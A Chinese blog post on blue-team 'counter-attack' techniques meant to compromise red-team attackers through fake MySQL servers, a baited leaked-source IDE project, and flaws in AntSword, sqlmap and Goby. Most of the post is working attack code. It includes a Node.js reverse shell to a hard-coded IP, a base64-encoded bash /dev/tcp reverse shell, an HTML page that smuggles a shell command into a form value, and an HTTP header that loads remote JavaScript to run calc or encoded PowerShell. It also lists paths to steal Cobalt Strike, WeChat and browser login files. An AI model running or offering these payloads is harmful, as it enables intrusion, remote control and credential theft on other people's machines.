蓝队技能-溯源反制篇&暴打红队&蜜罐读取&IDE上线&蚁剑RCE&Goby资产&Sqlmap命令

Ethan医生1个月前信息收集87

 蓝队技能-溯源反制-蜜罐&安全工具

#溯源反制-蜜罐-伪装MYSQL

当红队小子对目标进行扫描时,发下存在MYSQL安全问题去利用,便会落入蓝队的陷阱

https://github.com/ev0A/Mysqlist

蓝队:

1、修改读取文件字典

如:

-CS配置文件

C:/Users/Administrator/.aggressor.prop

-微信号配置文件

E:/WeChatFiles/WeChat Files/All Users/config/config.data

-浏览器历史记录

C:/Users/Administrator/AppData/Local/Microsoft/Edge/User Data/Default/Login Data

2、交互式或字典式启动(python2版本运行)

c:\Python27\python.exe exp_dicc.py 3306

c:\Python27\python.exe exp_input.py 3306

 

红队:

采用MYSQL客户端连接后触发

 

 

#溯源反制-蜜罐-伪装源码泄漏

当红队小子对网站进行目录扫描时,发现一个源码包,恰好又会点代审,便会落入蓝队的陷阱前端页面推荐使用登录框,使得红队束手被迫目录扫描,zip包名称推荐source.zip[域名].zip等

https://github.com/wendell1224/ide-honeypot

蓝队:

1、制作蜜罐源代码及配置启动程序workspace.xml

源代码:存放一些正常的源代码程序文件

配置启动:https://github.com/no-one-sec/idea-project-fish-exploit

2、将网站选择性编辑迷惑

· view 目录下放index.html模板文件

· js/css/fonts/img 等目录则是放静态资源

· favicon.ico放在与main.go同级目录(也可以不需要)

· source目录则是jb小子要打开的目录,src下可以放一下没用的源码增加zip包体积诱惑攻击队

3、启动项目等待红队上钩

ide-honeypot.exe -h 0.0.0.0 -p 8080 -f www -c "calc"

 

红队:

开始扫描,找到源码,开始审计,GG

 

 

#溯源反制-Webshell工具-AntSword

蓝队通过修改被植入后门的代码实现获得蚁剑使用者的权限

复现环境:<= v2.0.7 版本蚁剑反制

蓝队:Linux Web

红队:Windows AntSword

原理:

<?php

header('HTTP/1.1 500 <img src=# onerror=alert(1)>');

上线:

Nodejs代码:

var net = require("net"), sh = require("child_process").exec("cmd.exe");

var client = new net.Socket();

client.connect(xx, "xx.xx.xx.xx", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

编码组合后:

header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgIjQ3Ljk0LjIzNi4xMTciLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpO3NoLnN0ZGVyci5waXBlKGNsaWVudCk7fSk7`,`base64`).toString())'>");

 

#溯源反制-SQL注入工具-SQLMAP

蓝队提前构造注入页面诱使红队进行SqlMap注入拿到红队机器权限

复现环境:

蓝队:Linux Web

红队:Linux sqlmap

原理:

命令管道符:ping "`dir`"

构造注入点页面固定注入参数值,等待攻击者进行注入

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`dir`"

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`exec /bin/sh 0</dev/tcp/47.94.236.117/2333 1>&0 2>&0`"

 

1、测试反弹编码:

bash -i >& /dev/tcp/47.94.236.117/2333 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ==

echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i

2、蓝队构造页面test.php注入页面固定参数值:

<html>

<head>

<meta charset="utf-8">

<title> A sqlmap honeypot demo</title>

</head>

<body>

<input>search the user</input> <!--创建一个空白表单-->

<form action="username.html" method="post" enctype="text/plain">

<!--创建一个隐藏的表单-->

<input type='hidden' name='name' value="xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"/>

<!--创建一个按钮,提交表单内容-->

<input type="submit" value='提交'>


</form>

</body>

</html>

3、红队攻击者进行注入测试:

sqlmap -u "http://xx.xx.xx.xx/test.php" --data "name=xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"

 

#溯源反制-漏洞扫描工具-Goby

蓝队在红队攻击目标端口上写一个文件,

红队利用goby去扫描分析时会触发反制得到机器权限

复现环境:

蓝队:Linux Web

红队:Windows10 Goby

RCE:

index.php

<?php

header("X-Powered-By: PHP/<img src=1 onerror=import(unescape('http%3A//47.94.236.117/1.js'))>");

?>

<head>

<title>TEST</title>

</head>

<body>

testtest

</body>

</html>

1.js

(function(){

require('child_process').exec('calc.exe');

})();

2.js上线:

(function(){

require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');

})();


标签: 蓝队技能

相关文章

蓝队技能-应急响应篇&内网攻防&爆破事件&代理隧道&流量提进程&系统日志&处置封锁

➢ 蓝队技能-内网攻防-口令爆破&隧道技术&排查&应急#口令横向场景说明:不管在内网还是在外网,协议口令爆破一直是攻击最常见的方式。1、明确对应口令爆破的日志存储路径...

蓝队技能-应急响应篇&近源攻击&Docker镜像&容器分析&Dockfile路径定位&基线扫描

➢ 蓝队技能-Docker镜像-容器分析&处置配置&基线检测#Docker应急Docker拉取的镜像被攻击者拿下,植入后门或挖矿等恶意应用,那么该如何应急?1、启动镜像例子1...

蓝队技能-应急响应篇&日志采集&提取查看&自动化分析Web安全&内网攻防&工具项目

➢ 蓝队技能-工具项目-日志收集&提取查看&自动分析#日志自动提取1、七牛Logkit:(Windows&Linux&Mac等)项目地址:https://gi...

蓝队技能-设备部署篇&雷池WAF保护Web&蜜罐HFish溯源&堡垒机JumpServer资产管理

➢ 蓝队技能-设备部署-WAF-Web-雷池➢ 蓝队技能-设备部署-蜜罐-服务-HFish➢ 蓝队技能-设备部署-堡垒机-JumpServer#WAF-雷池SafeLin...

蓝队技能-流量分析篇&内网隧道工具 类&版本标记&字符特征&FRP&NPS&reGeorg&Venom

➢ 蓝队技能-流量分析-内网隧道代理工具#蓝队技能-流量分析-内网隧道代理工具#Frphttps://github.com/fatedier/frp一个专注于内网穿透的高性能的反向代理应用,...

蓝队技能-应急响应篇&Web入侵指南&后门查杀&日志分析&流量解密&攻击链梳理&排查口

蓝队技能-应急响应篇&Web入侵指南&后门查杀&日志分析&流量解密&攻击链梳理&排查口

➢ 蓝队技能-Web入侵-入口&查杀&攻击链等#Web攻击事件获取当前WEB环境的组成架构(脚本,数据库,中间件,系统等)分析思路:1、利用时间节点筛选日志行为2、利用对漏洞...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。